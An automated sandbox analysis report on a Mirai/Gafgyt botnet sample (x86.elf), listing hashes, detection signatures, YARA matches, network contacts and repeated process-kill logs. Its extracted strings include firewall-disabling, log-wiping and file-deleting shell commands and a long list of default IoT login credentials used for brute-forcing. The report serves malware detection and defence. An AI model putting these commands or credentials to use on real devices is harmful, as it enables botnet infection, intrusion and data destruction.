Linux Analysis Report
x86.elf

Overview

General Information

Sample name: x86.elf
Analysis ID: 1526774
MD5: 99fc77d3b5e1fc2d3242ca25b4624389
SHA1: 3103f833991e51be8cdd434194383bd12c0b0a2f
SHA256: 376b7113fb1a872e9403c95d2930fcea98f90fb702500009ed0557d2df806785
Tags: user-elfdigest
Infos:

Detection

Mirai
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Machine Learning detection for sample
Manipulation of devices in /dev
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

barindex
Source: x86.elf ReversingLabs: Detection: 55%
Source: x86.elf Virustotal: Detection: 35% Perma Link
Source: x86.elf Joe Sandbox ML: detected
Source: /usr/bin/pkill (PID: 5510) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5519) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5523) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Networking

barindex
Source: /bin/sh (PID: 5850) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5870) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /usr/sbin/service (PID: 5527) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5527) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: global traffic TCP traffic: 192.168.2.14:34156 -> 156.238.224.214:8443
Source: global traffic TCP traffic: 192.168.2.14:34872 -> 212.118.43.167:2222
Source: /bin/sh (PID: 5505) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 5535) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5537) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 5850) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5870) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 51.77.149.139
Source: unknown UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: global traffic DNS traffic detected: DNS query: octopus1337.geek

System Summary

barindex
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: x86.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5588, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5632, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5587, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5616, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5638, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5680, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5636, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5685, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5713, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5683, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5708, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5731, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5733, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5735, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5734, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5790, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5801, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5832, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5851, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 800, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 803, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1364, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1369, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1371, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1383, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1394, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1560, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1564, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1567, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1577, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1588, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1593, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1610, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1630, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1633, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1635, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1639, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1640, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1642, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1647, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1650, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1653, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1655, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1659, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1661, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1683, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1712, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1717, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2946, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2997, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2999, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3120, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3129, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3142, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3147, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3184, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3187, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3188, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3189, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3190, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3193, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3207, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3215, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3235, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3245, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3246, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3268, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3304, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3319, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3329, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3341, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3353, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3361, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3392, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3398, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3402, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3406, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3412, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3425, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3688, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5507, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5732, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5776, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5786, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5787, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5777, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5822, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5868, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5874, result: successful Jump to behavior
Source: Initial sample String containing 'busybox' found: pkill -9 busybox
Source: Initial sample String containing 'busybox' found: x86.32rm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stopservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp/sbin/iptables -F; /sbin/iptables -X
Source: Initial sample String containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: /dev/watchdog/dev/misc/watchdogPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobody1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i thinkbindtoipconnectpoll/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPTb^
Source: ELF static info symbol of initial sample .symtab present: no
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5588, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5632, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5587, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5616, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5638, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5680, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5636, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5685, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5713, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5683, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5708, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5731, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5733, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5735, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5734, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5790, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5801, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5832, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5556) SIGKILL sent: pid: 5851, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 800, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 803, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1364, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1369, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1371, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1383, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1394, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1560, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1564, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1567, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1577, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1588, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1593, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1610, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1630, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1633, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1635, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1639, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1640, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1642, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1647, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1650, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1653, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1655, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1659, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1661, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1683, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1712, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 1717, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2946, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2997, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 2999, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3120, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3129, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3142, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3147, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3184, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3187, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3188, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3189, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3190, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3193, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3207, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3215, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3235, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3245, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3246, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3268, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3304, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3319, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3329, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3341, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3353, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3361, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3392, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3398, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3402, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3406, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3412, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3425, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 3688, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5507, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5732, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5776, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5786, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5787, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5777, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5822, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5868, result: successful Jump to behavior
Source: /tmp/x86.elf (PID: 5557) SIGKILL sent: pid: 5874, result: successful Jump to behavior
